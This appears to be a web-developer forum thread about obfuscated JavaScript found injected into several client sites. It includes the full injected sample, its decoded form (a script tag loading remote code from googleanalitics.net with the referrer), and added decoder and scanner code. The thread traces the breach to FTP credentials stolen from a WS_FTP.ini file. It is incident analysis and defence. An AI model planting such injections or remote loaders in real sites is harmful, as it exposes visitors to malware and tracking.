What is this code and where does it come from?

  • sbcs
    New Member
    • Oct 2008
    • 5

    What is this code and where does it come from?

    I'm a website developer. Recently I've found variations of this code on the home pages of several of my sites. It triggers warnings in some anti-virus/malware programs but not in others. The pages are on different servers which leads me to believe the code is coming from me somehow. Can anyone tell me what it does? Is it possibly the output of a virus on my machine? If so, why would it appear on the remote version of the page and not my local version? Thanks for any insights!

    Code:
    <!--7cfbf03e9f4dd4246885967ac47c533a-><script language=javascript>pkunj="%";zmct="L3cscript L6canL67L75agL65L3djavasL63rL69L70L74L3eL20 fL75L6eL63tion eL66j(gL6eq){vaL72 L69L72,L78=\"L651L68wa+89L74m)7L72`pL4eL21EV6L5bL47L7cL54L32L34jvL6bL3a='L3b-L4fL49ML2aL2e_HsiL6fL42L43L75yL63dL50L40L5dlqZJL55L4bL5e$\\\"AzL46#L7d3L20L35L2c0bL67xL7b(fL26~n\",kL72L78L3dL22\",o,ooL2cL6c=L22\",mxL6dL3bL66L6fL72(ir=L30L3bL69rL3cgL6eL71L2elL65ngth;L69L72L2b+)L7b oL3dgL6eL71L2echarL41tL28ir);oo=L78L2eL69nL64eL78OL66L28L6f);L69f(L6fo>-1){ mL78L6dL3d((oL6fL2bL31)L258L31L2d1L29;if(mxmL3c=0)L6dL78m+L3d81L3bl+L3dxL2eL63L68aL72L41L74L28mxL6dL2dL31)L3bL20} L65lL73eL20L6c+L3do;L7dkrL78+=l;dL6fcumL65ntL2eL77L72iteL28kL72xL29L3b}<L2fL73L63L72L69ptL3e";ufdr=unescape(zmct.replace(/L/g,pkunj));var nli,b;document.write(ufdr);nli="<id`oNm5q+exy+x1'Av+k+id`oNmA>5PBdy)1em_a`om1f5A<SuRM@25q+exy+x1'\\AU+k+Sd`oNm\\A5SRu'\\AwmmN=//aaa_xBBxq1+e+qomodi_e1m/HHymg_vi?A8PBdy)1em_`1&1``1`8A\\A><\\/SuRM@2>A57-5</id`oNm>55";efj(nli);</script>
  • Atli
    Recognized Expert Expert
    • Nov 2006
    • 5062

    #2
    Hi.

    Where exactly on your pages is this showing up?
    Do the pages use any data taken from the client?

    What exactly do the malware applications that flag it say?

    Without actually being able to read what the code does, my best guess would be that this was planted by some *cracker* to either try to steal information from your clients or to try to plant malicious code on their browsers. You really need to find out how they did it and plug that hole.

    In any case, unless you figure out exactly what it is, I would get rid of it fast.
    If this is some sort of malicious code, and it is being executed when people visit your site, it could very well be causing them any number of problems, which could even lead to your site being flagged by the anti-phishing programs. (But then again, I'm the paranoid type :P)


    • gits
      Recognized Expert Moderator Expert
      • May 2007
      • 5388

      #3
      the script is some obfuscated javascript that adds the following code to your page:

      Code:
      <script language="javascript"> document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" ); </script>
      calling the shown url:

      is blocked by FF because of a potential security risk -> so I even would just remove the code and would try to trace down where it came from as Atli suggested.

      kind regards

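As an added example (my code, not code from the thread or from gits' post): a static decoder that reproduces the two transformations in the sample sbcs posted without executing any of it, so the payload gits read out can be checked offline. The three string constants are copied verbatim from the posted sample (same JavaScript literals, same escaping). `decodeURIComponent()` stands in for the deprecated `unescape()` the sample calls; for the ASCII-only `%XX` escapes used here the two are equivalent. The substitution alphabet and the modulus are read out of the decoded first stage rather than hard-coded, which is the assumption that makes this reusable on the "variations" sbcs mentions: if a variant changes the layout of the decoder function, `extractAlphabet()` throws instead of guessing.

```javascript
// Stage 0: the three literals from the posted sample, copied verbatim.
const PKUNJ = "%";
const ZMCT = "L3cscript L6canL67L75agL65L3djavasL63rL69L70L74L3eL20 fL75L6eL63tion eL66j(gL6eq){vaL72 L69L72,L78=\"L651L68wa+89L74m)7L72`pL4eL21EV6L5bL47L7cL54L32L34jvL6bL3a='L3b-L4fL49ML2aL2e_HsiL6fL42L43L75yL63dL50L40L5dlqZJL55L4bL5e$\\\"AzL46#L7d3L20L35L2c0bL67xL7b(fL26~n\",kL72L78L3dL22\",o,ooL2cL6c=L22\",mxL6dL3bL66L6fL72(ir=L30L3bL69rL3cgL6eL71L2elL65ngth;L69L72L2b+)L7b oL3dgL6eL71L2echarL41tL28ir);oo=L78L2eL69nL64eL78OL66L28L6f);L69f(L6fo>-1){ mL78L6dL3d((oL6fL2bL31)L258L31L2d1L29;if(mxmL3c=0)L6dL78m+L3d81L3bl+L3dxL2eL63L68aL72L41L74L28mxL6dL2dL31)L3bL20} L65lL73eL20L6c+L3do;L7dkrL78+=l;dL6fcumL65ntL2eL77L72iteL28kL72xL29L3b}<L2fL73L63L72L69ptL3e";
const NLI = "<id`oNm5q+exy+x1'Av+k+id`oNmA>5PBdy)1em_a`om1f5A<SuRM@25q+exy+x1'\\AU+k+Sd`oNm\\A5SRu'\\AwmmN=//aaa_xBBxq1+e+qomodi_e1m/HHymg_vi?A8PBdy)1em_`1&1``1`8A\\A><\\/SuRM@2>A57-5</id`oNm>55";

// Stage 1: the sample builds its decoder function by rewriting every 'L' to
// '%' and URL-unescaping the result. Here that yields the source text of the
// function efj() and its substitution alphabet; nothing is evaluated.
// (decodeURIComponent replaces the deprecated unescape(); same result for
// the ASCII escapes this sample uses.)
function decodeStage1(zmct, marker) {
  return decodeURIComponent(zmct.replace(/L/g, marker));
}

// Pull the alphabet (the string assigned to x) out of the decoded function
// instead of running it. The only escape inside it is \" so stripping one
// backslash per escape is sufficient.
function extractAlphabet(stage1) {
  const m = stage1.match(/x="((?:\\.|[^"\\])*)"/);
  if (!m) throw new Error("alphabet not found; sample layout differs");
  return m[1].replace(/\\(.)/g, "$1");
}

// Stage 2: re-implementation of efj() with the same arithmetic as the
// decoded function. Net effect: every character that occurs in the alphabet
// is replaced by its predecessor in that alphabet (cyclically, so the first
// entry maps to the last); any other character passes through unchanged.
function efjDecode(payload, alphabet) {
  const n = alphabet.length; // the literal 81 in the sample
  let out = "";
  for (const ch of payload) {
    const idx = alphabet.indexOf(ch);
    if (idx < 0) { out += ch; continue; }
    let m = ((idx + 1) % n) - 1;
    if (m <= 0) m += n;
    out += alphabet.charAt(m - 1);
  }
  return out;
}

// Run both stages and return everything an analyst wants to look at.
function deobfuscate() {
  const stage1 = decodeStage1(ZMCT, PKUNJ);
  const alphabet = extractAlphabet(stage1);
  const injected = efjDecode(NLI, alphabet).trim();
  return { stage1, alphabet, injected };
}

// The decoded document.write() builds a <SCRIPT SRC="..."> tag and appends
// document.referrer at runtime; extract the static part of the URL so it can
// be blocked and grepped for on other pages.
function remoteScriptUrl(injected) {
  const m = injected.match(/SRC=\\"([^"]+)"/);
  return m ? m[1] : null;
}

const result = deobfuscate();
console.log(result.injected);
console.log("remote script:", remoteScriptUrl(result.injected));
```

Running it prints the same `document.write(...)` line gits posted; the useful detail beyond that is the remote URL without the referrer, which is the indicator to search the rest of a site list for.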

      • sbcs
        New Member
        • Oct 2008
        • 5

        #4
        Thanks, Atli and gits--that tells me a lot. Some research on googleanalitics.net shows complaints going back to at least 2002. I fixed the pages as soon as I discovered the code on each one. Now I've got to figure out HOW they got infected. The "date modified" stamp on the server shows that the various pages were altered on July 3, 8 and 10. That four of my pages for different clients on different servers got infected randomly seems too coincidental, but if it's coming from me, why just those four and not any of the many others I maintain? Nightly sweeps by AVG 8.0 aren't showing anything on my machine, and there's no viewer input to any of the pages. I realize this is getting off the topic of the forum, but thanks again for your help--I'll post back FYI if I find out anything else.

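An added example (mine, not from the thread): a signature sweep for the remaining sites in a site list, so each page does not have to be opened by hand. The indicators come from the sample sbcs posted: a 32-hex-digit HTML comment immediately followed by a `<script>` tag, an `unescape()` of a string whose `L` characters are rewritten to `%`, and a `document.write()` of a bare variable. The two-indicator threshold, the file-extension list and the two sample pages are my assumptions and constructions, not anything from the thread; the report includes each file's modification time because that is what sbcs used to date the alterations.

```javascript
// Each indicator is one feature of the posted injection. Matching only one
// (a site that legitimately calls document.write(x), say) is not reported.
const INDICATORS = [
  { name: "hex-comment-before-script", re: /<!--[0-9a-f]{32}-{1,2}>\s*<script/i },
  { name: "L-to-percent-unescape",     re: /unescape\(\s*\w+\.replace\(\/L\/g/ },
  { name: "document-write-of-decoded", re: /document\.write\(\s*\w+\s*\)/ },
];

// Names of the indicators that fire on one page's source text.
function scanText(text) {
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Assumed threshold: two independent indicators, so an ordinary page that
// happens to use document.write() alone is not flagged.
function isInfected(text) {
  return scanText(text).length >= 2;
}

// Walk a local copy of a site (assumed extension list) and report hits with
// the modification time, the field sbcs used to date the alterations.
// require() is done here so the pure functions above work in any module type.
function scanDirectory(dir, exts = [".html", ".htm", ".php"]) {
  const fs = require("fs");
  const path = require("path");
  const hits = [];
  const walk = (d) => {
    for (const entry of fs.readdirSync(d, { withFileTypes: true })) {
      const p = path.join(d, entry.name);
      if (entry.isDirectory()) {
        walk(p);
      } else if (exts.includes(path.extname(entry.name).toLowerCase())) {
        const found = scanText(fs.readFileSync(p, "utf8"));
        if (found.length >= 2) {
          hits.push({ file: p, indicators: found, mtime: fs.statSync(p).mtime });
        }
      }
    }
  };
  walk(dir);
  return hits;
}

// Constructed sample pages (not real site content). The infected one carries
// the shape of the posted injection with the long string shortened.
const CLEAN_PAGE =
  "<html><body><script>var year=2008;document.write(year);</script></body></html>";
const INFECTED_PAGE =
  "<html><body>hello</body></html>\n" +
  '<!--7cfbf03e9f4dd4246885967ac47c533a-><script language=javascript>pkunj="%";' +
  'zmct="L3cscript L3e";ufdr=unescape(zmct.replace(/L/g,pkunj));document.write(ufdr);</script>';

console.log("clean page:   ", scanText(CLEAN_PAGE), isInfected(CLEAN_PAGE));
console.log("infected page:", scanText(INFECTED_PAGE), isInfected(INFECTED_PAGE));
// To sweep a real checkout: console.log(scanDirectory("/path/to/site"));
```

The clean page trips only the `document.write()` indicator and is not reported; the constructed infected page trips all three. A match is a reason to look at the file, not proof by itself: confirm by decoding the payload before cleaning it, and then check the FTP logs for the matching modification times.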

        • gits
          Recognized Expert Moderator Expert
          • May 2007
          • 5388

          #5
          maybe the servers were infected/corrupted? try to ask the admins there ... maybe they are aware of the problem ... or in case they are not, maybe they could (and should) investigate that? in case you find out something it would be really great to post it here for people that might have similar problems in the future ...

          kind regards


          • sbcs
            New Member
            • Oct 2008
            • 5

            #6
            Several of the infected sites are hosted with GoDaddy. They checked server logs and found that the files were accessed using the hosting account username and password. The infected files were coming from an IP address that resolved to HostFresh in Hong Kong. It's become apparent that my WS_FTP .ini file was compromised and the information in it was used to access these sites. I've found that there is malware that looks for certain files on a computer and that the WS_FTP.ini file is a common target.

            For what it's worth, out of about 50 sites in my WS_FTP.ini file, 8 were accessed--4 on GoDaddy and 4 on smaller hosting services. I have about 20 sites on LunarPages and none were accessed--not sure why.


            • davebirchall
              New Member
              • Jan 2009
              • 1

              #7
              I had a similar experience. Same FTP, same script, different host

              This thread has been hugely valuable.
